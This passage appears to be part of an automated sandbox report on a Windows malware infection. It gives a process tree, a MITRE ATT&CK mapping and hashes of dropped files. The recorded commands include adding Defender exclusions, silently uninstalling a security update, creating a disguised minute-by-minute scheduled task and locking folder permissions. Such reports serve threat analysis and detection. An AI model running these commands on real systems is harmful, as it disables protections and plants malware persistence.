                                                                                    1⤵
                                                                                      PID:6820
                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                      1⤵
                                                                                        PID:7136
                                                                                      • C:\Windows\system32\browser_broker.exe
                                                                                        C:\Windows\system32\browser_broker.exe -Embedding
                                                                                        1⤵
                                                                                          PID:3184
                                                                                        • C:\Windows\system32\browser_broker.exe
                                                                                          C:\Windows\system32\browser_broker.exe -Embedding
                                                                                          1⤵
                                                                                            PID:6900
                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:6252
                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:5240
                                                                                              • C:\Windows\system32\browser_broker.exe
                                                                                                C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                1⤵
                                                                                                  PID:2416
                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:4548
                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                    1⤵
                                                                                                      PID:7052
                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                      1⤵
                                                                                                        PID:6692
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                        1⤵
                                                                                                          PID:3684
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                          1⤵
                                                                                                            PID:5560
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A5EB.bat" "
                                                                                                            1⤵
                                                                                                              PID:5192
                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                2⤵
                                                                                                                  PID:4332
                                                                                                              • C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe
                                                                                                                C:\ProgramData\tcxbtjpidyhi\wfnmgjmvvtwt.exe
                                                                                                                1⤵
                                                                                                                  PID:6780
                                                                                                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                    2⤵
                                                                                                                      PID:6232
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                      2⤵
                                                                                                                        PID:780
                                                                                                                        • C:\Windows\system32\wusa.exe
                                                                                                                          wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                          3⤵
                                                                                                                            PID:6908
                                                                                                                        • C:\Windows\system32\conhost.exe
                                                                                                                          C:\Windows\system32\conhost.exe
                                                                                                                          2⤵
                                                                                                                            PID:6120
                                                                                                                          • C:\Windows\system32\conhost.exe
                                                                                                                            conhost.exe
                                                                                                                            2⤵
                                                                                                                              PID:6388
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\D307.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\D307.exe
                                                                                                                            1⤵
                                                                                                                              PID:6908
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\D307.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\D307.exe
                                                                                                                                2⤵
                                                                                                                                  PID:6916
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Users\Admin\AppData\Local\2402aff2-ebd7-4e59-9c1e-f64b83177112" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                    3⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:6308
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\D307.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\D307.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                    3⤵
                                                                                                                                      PID:4896
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D307.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\D307.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                        4⤵
                                                                                                                                          PID:6044
                                                                                                                                          • C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build2.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build2.exe"
                                                                                                                                            5⤵
                                                                                                                                              PID:7108
                                                                                                                                              • C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build2.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build2.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:6804
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6804 -s 2052
                                                                                                                                                    7⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:5368
                                                                                                                                              • C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build3.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build3.exe"
                                                                                                                                                5⤵
                                                                                                                                                  PID:2572
                                                                                                                                                  • C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build3.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\b2e050a1-1291-4933-bd3b-bbde4d1e3586\build3.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:4256
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                        7⤵
                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                        PID:5864
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\EB91.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\EB91.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:6712
                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                2⤵
                                                                                                                                                  PID:5836
                                                                                                                                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4592
                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6712 -s 780
                                                                                                                                                    2⤵
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:5400
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\17F1.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\17F1.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1128
                                                                                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                    1⤵
                                                                                                                                                      PID:6708
                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                        PID:3848
                                                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\22B0.bat" "
                                                                                                                                                        1⤵
                                                                                                                                                          PID:672
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg add "HKEY_CURRENT_USER\Software\clicker\key" /v primary /t REG_DWORD /d 1
                                                                                                                                                            2⤵
                                                                                                                                                              PID:6232
                                                                                                                                                          • C:\Windows\system32\browser_broker.exe
                                                                                                                                                            C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                              PID:2120
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6008
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:6564
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1001050001\NewB.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:5920
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:2996
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7B2D.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7B2D.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4244
                                                                                                                                                                        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                          C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:1376
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\9666.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\9666.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3124
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -nologo -noprofile
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:5928
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\9666.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\9666.exe"
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2572
                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                    powershell -nologo -noprofile
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:7112
                                                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                                                  explorer.exe
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:6196
                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:5824
                                                                                                                                                                                    • C:\Windows\windefender.exe
                                                                                                                                                                                      C:\Windows\windefender.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:3452

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v13

                                                                                                                                                                                      Execution

                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Persistence

                                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                                      3
                                                                                                                                                                                      T1543

                                                                                                                                                                                      Windows Service

                                                                                                                                                                                      3
                                                                                                                                                                                      T1543.003

                                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547

                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547.001

                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                      Create or Modify System Process

                                                                                                                                                                                      3
                                                                                                                                                                                      T1543

                                                                                                                                                                                      Windows Service

                                                                                                                                                                                      3
                                                                                                                                                                                      T1543.003

                                                                                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547

                                                                                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                                                                                      1
                                                                                                                                                                                      T1547.001

                                                                                                                                                                                      Scheduled Task/Job

                                                                                                                                                                                      1
                                                                                                                                                                                      T1053

                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                      2
                                                                                                                                                                                      T1497

                                                                                                                                                                                      Impair Defenses

                                                                                                                                                                                      2
                                                                                                                                                                                      T1562

                                                                                                                                                                                      Disable or Modify System Firewall

                                                                                                                                                                                      1
                                                                                                                                                                                      T1562.004

                                                                                                                                                                                      File and Directory Permissions Modification

                                                                                                                                                                                      1
                                                                                                                                                                                      T1222

                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                      3
                                                                                                                                                                                      T1112

                                                                                                                                                                                      Subvert Trust Controls

                                                                                                                                                                                      1
                                                                                                                                                                                      T1553

                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                      1
                                                                                                                                                                                      T1553.004

                                                                                                                                                                                      Credential Access

                                                                                                                                                                                      Unsecured Credentials

                                                                                                                                                                                      4
                                                                                                                                                                                      T1552

                                                                                                                                                                                      Credentials In Files

                                                                                                                                                                                      3
                                                                                                                                                                                      T1552.001

                                                                                                                                                                                      Credentials in Registry

                                                                                                                                                                                      1
                                                                                                                                                                                      T1552.002

                                                                                                                                                                                      Discovery

                                                                                                                                                                                      Query Registry

                                                                                                                                                                                      6
                                                                                                                                                                                      T1012

                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                      2
                                                                                                                                                                                      T1497

                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                      4
                                                                                                                                                                                      T1082

                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1120

                                                                                                                                                                                      Remote System Discovery

                                                                                                                                                                                      1
                                                                                                                                                                                      T1018

                                                                                                                                                                                      Collection

                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                      4
                                                                                                                                                                                      T1005

                                                                                                                                                                                      Command and Control

                                                                                                                                                                                      Web Service

                                                                                                                                                                                      1
                                                                                                                                                                                      T1102

                                                                                                                                                                                      Impact

                                                                                                                                                                                      Service Stop

                                                                                                                                                                                      1
                                                                                                                                                                                      T1489

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\ProgramData\Are.docx
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        11KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a33e5b189842c5867f46566bdbf7a095

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        e1c06359f6a76da90d19e8fd95e79c832edb3196

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

                                                                                                                                                                                      • C:\ProgramData\mozglue.dll
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        593KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        c8fd9be83bc728cc04beffafc2907fe9

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        94855049590df2a11123e4b4dfb202a0

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        60934db6289c32668291284f4024608874fc4901

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        6a050ffa045a5aa2214f5452b3a580e33c0d488eeec2cffd76cf5a656ede0e2a

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        7c6e93423e2fab8e3536add6b3d5df552541afbb0a95d6fb8f1c5f4f7882ea549a84ef00cd66f4c5765bdb80d36749db165e64456d8059e1c7368185d6b5579e

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\W0AZVRYP\edgecompatviewlist[1].xml
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        74KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d4fc49dc14f63895d997fa4940f24378

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3efb1437a7c5e46034147cbbc8db017c69d02c31

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        853d2f4eb81c9fdcea2ee079f6faf98214b111b77cdf68709b38989d123890f1

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        cc60d79b4afe5007634ac21dc4bc92081880be4c0d798a1735b63b27e936c02f399964f744dc73711987f01e8a1064b02a4867dd6cac27538e5fbe275cc61e0a

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\7JXS4S21\4Kv5U5b1o3f[1].png
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        610B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a81a5e7f71ae4153e6f888f1c92e5e11

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        39c3945c30abff65b372a7d8c691178ae9d9eee0

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        2bc7a47889c56ad49f1b8b97385d5a4d212e79bb8a9b30df0665a165f58b273e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1df32349b33f6a6fcb1f8b6093abd737fa0638cdd6e3fd90a7e1852bd0e40bc2633cb4e13c4824fb948d1e012e5cb9eed0b038b121404865495d4e57e123db69

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\BSGKE9VX\suggestions[1].en-US
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        17KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5a34cb996293fde2cb7a4ac89587393a

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        3c96c993500690d1a77873cd62bc639b3a10653f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cache\K69DF3CJ\favicon[1].ico
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f3418a443e7d841097c714d69ec4bcb8

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        49263695f6b0cdd72f45cf1b775e660fdc36c606

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\CMAA89HK.cookie
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        132B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        31557a5e1daebb10376ae63fca46dfa2

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        ade10a1565ba87e6f1b79ca15580f4189b4038c3

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        ba90a61ad825584a4949c974d193fc5598f7f5d5c0b2a958a089d7f0362d0775

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        588a28a8df3477ef4a326f4db6625f9bc018fd6be8e97e40d8597aee638af84c20edb39c068c82168f473c6b951f729bb9c9dd5e68168c4d48bb9a19f8abde2d

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\RACOQAWY.cookie
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        132B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        4b2a2836e279e7d5d020644a444fa3c9

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        632136b62ffab5109004854dbc1adc379d64b369

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        76290eff6070c1d0d92cdc5ed19ecf063c085b408b30ae65a7edd6d1a830407e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1f70372dee274d7bf6a57748b02b9a5992fef4b0fd52b202f0d560ee239b342a063ae0de3b8f3d08c6a83d0e4bb205aa873f2ee683e43850a2a0e543f78b8078

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\ZWZDL5S2.cookie
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        314B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        f10c4346e297645f986c63e27b944119

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6a7774897e3223cc8aeedbd3e5eae2681f288b3a

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        b2da82e0e0b4253a74d28c386f6590b20d28be4a74540d5359a09345377ed312

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        666e5ecdc45dfb4336975c42f88910de622add19ade4927f512c165b6d0c082a9a2e21932676aa67e86ce9515841814461d7b78d8c2d2aba7939472c9df66a6d

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        2a789d6b366b95c47c2e68c27f863f81

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        1b123bd94179f5b8746bc960691ddb9546855e05

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        ba4990d90cdd27ce932e39c10e178659436aeb5a290faa47f4825da9eca6bc94

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        027180aabc65ae3ca35f83161b11d289d87af854656483ac2cf703d94f695c4d5bce0fce1901278ab4cbfc985c9b9aa1f455c889913834c4b1734a365c7f8e3b

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        1bfe591a4fe3d91b03cdf26eaacd8f89

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        719c37c320f518ac168c86723724891950911cea

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        724B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ac89a852c2aaa3d389b2d2dd312ad367

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        8f421dd6493c61dbda6b839e2debb7b50a20c930

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0b720e19270c672f9b6e0ec40b468ac49376807de08a814573fe038779534f45

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        c6a88f33688cc0c287f04005e07d5b5e4a8721d204aa429f93ade2a56aeb86e05d89a8f7a44c1e93359a185a4c5f418240c6cdbc5a21314226681c744cf37f36

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_60F579AD9285D81DB40FAEE3D3BD4004
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        472B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        bc42cc4ae4817b4c471c397edb021714

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        7a0a3e93e87cc8f75beaeae92199fcbda0fa1818

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        349c99c6bd87be0c6b15f31c764bec23420c4a112d0e9b3033d0f1f058054640

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        f708e131762c1d51c539eecc79f3248e1c52424e1d3a079287e7725d034dd7889da1eecaac8053f5050db0b94a4b4c4fba20984cf871ef68503a1a0d539c947a

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        410B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        c4521045cb30c545f0437d5a49af9a37

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        9b64fdd771f26b55062218eb7c6d026e9dccf1d1

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        83d5e4fa3fc97dae73e18ced39ed820770f016c8570a8908e78086f38557e804

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        20bd789f6c021c4ae66711ab532ce7a7e14dbfe51427cd5d091d2784d118e49f95914825d4fc62585b5035ef2b8d0be1608f6328489070350aef353c9accf03d

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        410B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ccad3532778f3a8c90725861e0e7160b

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        bfe0c753e9215a61af377fe76e1d039fdecba088

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        71a8f3b0089ac2113c01e260f244b03aeaf89db9034b48c8cdc2edb4cab53418

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        acbfa8f2ee0a51c534597ca4ff5afa9b41a549d80b9b45ecb26c4ad1220869368adcdfa26fb880e2c7d09de99a4ba38fb92d7de9af9ba2345428ef442ae2b745

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.microsoftedge_8wekyb3d8bbwe\AC\#!001\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                        Filesize

                                                                                                                                                                                        338B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a3164f24bf0d3aebc78c0a5cb067b4d8

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        9b936ff5e406bcbb2fc3f68d6ee13bb30e94c513

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        88c1f44f3e30875a89c3974a67a299870a759528f4ba6e5da5e4436db4d2ccc5

                                                                                                                                                                                        SHA512

